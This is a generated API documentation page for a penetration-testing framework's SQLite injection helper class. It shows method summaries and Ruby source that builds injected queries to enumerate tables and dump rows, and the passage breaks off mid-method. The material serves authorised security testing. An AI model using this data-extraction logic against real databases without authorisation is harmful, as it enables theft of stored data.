adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/SQLi/SQLitei/Common.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

996 lines
58 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Class: Msf::Exploit::SQLi::SQLitei::Common
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::SQLi::SQLitei::Common";
relpath = '../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../_index.html">Index (C)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../SQLi.html" title="Msf::Exploit::SQLi (module)">SQLi</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../SQLitei.html" title="Msf::Exploit::SQLi::SQLitei (module)">SQLitei</a></span></span>
&raquo;
<span class="title">Common</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::SQLi::SQLitei::Common
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName"><span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></span>
<ul class="fullTree">
<li>Object</li>
<li class="next"><span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></li>
<li class="next">Msf::Exploit::SQLi::SQLitei::Common</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/sqli/sqlitei/common.rb</dd>
</dl>
</div>
<div id="subclasses">
<h2>Direct Known Subclasses</h2>
<p class="children"><span class='object_link'><a href="BooleanBasedBlind.html" title="Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind (class)">BooleanBasedBlind</a></span>, <span class='object_link'><a href="TimeBasedBlind.html" title="Msf::Exploit::SQLi::SQLitei::TimeBasedBlind (class)">TimeBasedBlind</a></span></p>
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="ENCODERS-constant" class="">ENCODERS =
<div class="docstring">
<div class="discussion">
<p>Encoders available for SQLite</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbrace'>{</span>
<span class='label'>hex:</span> <span class='lbrace'>{</span>
<span class='label'>encode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>hex(^DATA^)</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>decode:</span> <span class='id identifier rubyid_proc'>proc</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_data'>data</span><span class='op'>|</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_hex_to_raw'>hex_to_raw</span><span class='lparen'>(</span><span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_freeze'>freeze</span></pre></dd>
</dl>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes inherited from <span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Common.html#concat_separator-instance_method" title="Msf::Exploit::SQLi::Common#concat_separator (method)">#concat_separator</a></span>, <span class='object_link'><a href="../Common.html#datastore-instance_method" title="Msf::Exploit::SQLi::Common#datastore (method)">#datastore</a></span>, <span class='object_link'><a href="../Common.html#framework-instance_method" title="Msf::Exploit::SQLi::Common#framework (method)">#framework</a></span>, <span class='object_link'><a href="../Common.html#null_replacement-instance_method" title="Msf::Exploit::SQLi::Common#null_replacement (method)">#null_replacement</a></span>, <span class='object_link'><a href="../Common.html#safe-instance_method" title="Msf::Exploit::SQLi::Common#safe (method)">#safe</a></span>, <span class='object_link'><a href="../Common.html#second_concat_separator-instance_method" title="Msf::Exploit::SQLi::Common#second_concat_separator (method)">#second_concat_separator</a></span>, <span class='object_link'><a href="../Common.html#truncation_length-instance_method" title="Msf::Exploit::SQLi::Common#truncation_length (method)">#truncation_length</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html" title="Rex::Ui::Subscriber::Input (module)">Rex::Ui::Subscriber::Input</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html#user_input-instance_method" title="Rex::Ui::Subscriber::Input#user_input (method)">#user_input</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html" title="Rex::Ui::Subscriber::Output (module)">Rex::Ui::Subscriber::Output</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#user_output-instance_method" title="Rex::Ui::Subscriber::Output#user_output (method)">#user_output</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#dump_table_fields-instance_method" title="#dump_table_fields (instance method)">#<strong>dump_table_fields</strong>(table, columns, condition = &#39;&#39;, limit = &#39;&#39;) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Dumps data from a given table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_table_columns-instance_method" title="#enum_table_columns (instance method)">#<strong>enum_table_columns</strong>(table) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the names of the columns of the given table NOTE: might not work if pragma_table_info is not supported, use run_sql, and query sql from sqlite_master if you need it in older versions of SQLite @param table [String] The name of a table @return [Array] an array of strings, the names of the columns of the given table.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#enum_table_names-instance_method" title="#enum_table_names (instance method)">#<strong>enum_table_names</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the names of the tables present on the current database @return [Array] an array of Strings, the names of the tables in the current database.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(datastore, framework, user_output, opts = {}, &amp;query_proc) &#x21d2; SQLi::SQLitei::Common </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>Creates an SQLite injection object, refer to SQLi::Common#initialize for a description of the options.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#test_vulnerable-instance_method" title="#test_vulnerable (instance method)">#<strong>test_vulnerable</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns true if the SQL injection is found to work as expected @return [Boolean] whether the check determined that the SQL injection works.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#version-instance_method" title="#version (instance method)">#<strong>version</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the version of SQLite in use @return [String] The version of SQLite in use.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#write_to_file-instance_method" title="#write_to_file (instance method)">#<strong>write_to_file</strong>(fpath, data) &#x21d2; void </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Attempt writing data to the file at the given path Note: target must support stacked queries, and injection point must be at the start of a new query.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods inherited from <span class='object_link'><a href="../Common.html" title="Msf::Exploit::SQLi::Common (class)">Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Common.html#raw_run_sql-instance_method" title="Msf::Exploit::SQLi::Common#raw_run_sql (method)">#raw_run_sql</a></span>, <span class='object_link'><a href="../Common.html#run_sql-instance_method" title="Msf::Exploit::SQLi::Common#run_sql (method)">#run_sql</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI.html" title="Msf::Module::UI (module)">Module::UI</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI.html#init_ui-instance_method" title="Msf::Module::UI#init_ui (method)">#init_ui</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Message.html" title="Msf::Module::UI::Message (module)">Module::UI::Message</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Message.html#print_error-instance_method" title="Msf::Module::UI::Message#print_error (method)">#print_error</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_good-instance_method" title="Msf::Module::UI::Message#print_good (method)">#print_good</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_prefix-instance_method" title="Msf::Module::UI::Message#print_prefix (method)">#print_prefix</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_status-instance_method" title="Msf::Module::UI::Message#print_status (method)">#print_status</a></span>, <span class='object_link'><a href="../../../Module/UI/Message.html#print_warning-instance_method" title="Msf::Module::UI::Message#print_warning (method)">#print_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html" title="Msf::Module::UI::Message::Verbose (module)">Module::UI::Message::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_error-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_error (method)">#vprint_error</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_good-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_good (method)">#vprint_good</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_status-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_status (method)">#vprint_status</a></span>, <span class='object_link'><a href="../../../Module/UI/Message/Verbose.html#vprint_warning-instance_method" title="Msf::Module::UI::Message::Verbose#vprint_warning (method)">#vprint_warning</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Line.html" title="Msf::Module::UI::Line (module)">Module::UI::Line</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Line.html#print_line-instance_method" title="Msf::Module::UI::Line#print_line (method)">#print_line</a></span>, <span class='object_link'><a href="../../../Module/UI/Line.html#print_line_prefix-instance_method" title="Msf::Module::UI::Line#print_line_prefix (method)">#print_line_prefix</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Module/UI/Line/Verbose.html" title="Msf::Module::UI::Line::Verbose (module)">Module::UI::Line::Verbose</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Module/UI/Line/Verbose.html#vprint_line-instance_method" title="Msf::Module::UI::Line::Verbose#vprint_line (method)">#vprint_line</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html" title="Rex::Ui::Subscriber (module)">Rex::Ui::Subscriber</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#copy_ui-instance_method" title="Rex::Ui::Subscriber#copy_ui (method)">#copy_ui</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#init_ui-instance_method" title="Rex::Ui::Subscriber#init_ui (method)">#init_ui</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber.html#reset_ui-instance_method" title="Rex::Ui::Subscriber#reset_ui (method)">#reset_ui</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html" title="Rex::Ui::Subscriber::Input (module)">Rex::Ui::Subscriber::Input</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Input.html#gets-instance_method" title="Rex::Ui::Subscriber::Input#gets (method)">#gets</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html" title="Rex::Ui::Subscriber::Output (module)">Rex::Ui::Subscriber::Output</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#flush-instance_method" title="Rex::Ui::Subscriber::Output#flush (method)">#flush</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print-instance_method" title="Rex::Ui::Subscriber::Output#print (method)">#print</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_blank_line-instance_method" title="Rex::Ui::Subscriber::Output#print_blank_line (method)">#print_blank_line</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_error-instance_method" title="Rex::Ui::Subscriber::Output#print_error (method)">#print_error</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_good-instance_method" title="Rex::Ui::Subscriber::Output#print_good (method)">#print_good</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_line-instance_method" title="Rex::Ui::Subscriber::Output#print_line (method)">#print_line</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_status-instance_method" title="Rex::Ui::Subscriber::Output#print_status (method)">#print_status</a></span>, <span class='object_link'><a href="../../../../Rex/Ui/Subscriber/Output.html#print_warning-instance_method" title="Rex::Ui::Subscriber::Output#print_warning (method)">#print_warning</a></span></p>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(datastore, framework, user_output, opts = {}, &amp;query_proc) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::SQLi::SQLitei::Common (class)">SQLi::SQLitei::Common</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Creates an SQLite injection object, refer to SQLi::Common#initialize for a description of the options</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
23
24
25
26
27
28
29
30</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 23</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='comma'>,</span> <span class='id identifier rubyid_framework'>framework</span><span class='comma'>,</span> <span class='id identifier rubyid_user_output'>user_output</span><span class='comma'>,</span> <span class='id identifier rubyid_opts'>opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='comma'>,</span> <span class='op'>&amp;</span><span class='id identifier rubyid_query_proc'>query_proc</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:concat_separator</span><span class='rbracket'>]</span> <span class='op'>||=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>String</span><span class='rparen'>)</span> <span class='op'>||</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Symbol</span><span class='rparen'>)</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='period'>.</span><span class='id identifier rubyid_intern'>intern</span>
<span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#ENCODERS-constant" title="Msf::Exploit::SQLi::SQLitei::Common::ENCODERS (constant)">ENCODERS</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='const'><span class='object_link'><a href="#ENCODERS-constant" title="Msf::Exploit::SQLi::SQLitei::Common::ENCODERS (constant)">ENCODERS</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:encoder</span><span class='rbracket'>]</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='kw'>super</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="dump_table_fields-instance_method">
#<strong>dump_table_fields</strong>(table, columns, condition = &#39;&#39;, limit = &#39;&#39;) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Dumps data from a given table</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>table</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The name of the table</p>
</div>
</li>
<li>
<span class='name'>columns</span>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>an Array of Strings, the names of the columns to retrieve</p>
</div>
</li>
<li>
<span class='name'>condition</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>&#39;&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>an optional condition, return only records that satisfy it</p>
</div>
</li>
<li>
<span class='name'>limit</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>&#39;&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>optional, limit the number of rows to return to this value</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>an array of rows, each row being an array of strings, strings being values at the given columns</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 77</span>
<span class='kw'>def</span> <span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='id identifier rubyid_table'>table</span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='comma'>,</span> <span class='id identifier rubyid_condition'>condition</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_limit'>limit</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_one_column'>one_column</span> <span class='op'>=</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>if</span> <span class='id identifier rubyid_one_column'>one_column</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>ifnull(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='embexpr_end'>}</span><span class='tstring_content'>,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@null_replacement</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_columns'>columns</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@encoder</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_columns'>columns</span> <span class='op'>=</span> <span class='id identifier rubyid_columns'>columns</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_col'>col</span><span class='op'>|</span>
<span class='id identifier rubyid_col'>col</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>ifnull(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_col'>col</span><span class='embexpr_end'>}</span><span class='tstring_content'>,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@null_replacement</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>
<span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_col'>col</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_col'>col</span>
<span class='kw'>end</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>||&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@second_concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;||</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_condition'>condition</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span>
<span class='id identifier rubyid_condition'>condition</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> where </span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_condition'>condition</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>=</span> <span class='id identifier rubyid_limit'>limit</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='kw'>if</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='id identifier rubyid_limit'>limit</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> limit </span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_num_limit'>num_limit</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>if</span> <span class='ivar'>@safe</span>
<span class='comment'># no group_concat, leak one row at a time
</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select count(1) from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>=</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='kw'>if</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>==</span> <span class='int'>0</span> <span class='op'>||</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_num_limit'>num_limit</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_num_limit'>num_limit</span><span class='period'>.</span><span class='id identifier rubyid_times'>times</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_current_row'>current_row</span><span class='op'>|</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select substr(cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob),^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from </span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_content'> limit 1 offset </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_current_row'>current_row</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob) from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_content'> limit 1 offset </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_current_row'>current_row</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='kw'>if</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='id identifier rubyid_alias1'>alias1</span><span class='comma'>,</span> <span class='id identifier rubyid_alias2'>alias2</span> <span class='op'>=</span> <span class='int'>2</span><span class='period'>.</span><span class='id identifier rubyid_times'>times</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>9</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>select substr(group_concat(</span><span class='tstring_end'>&#39;</span></span> \
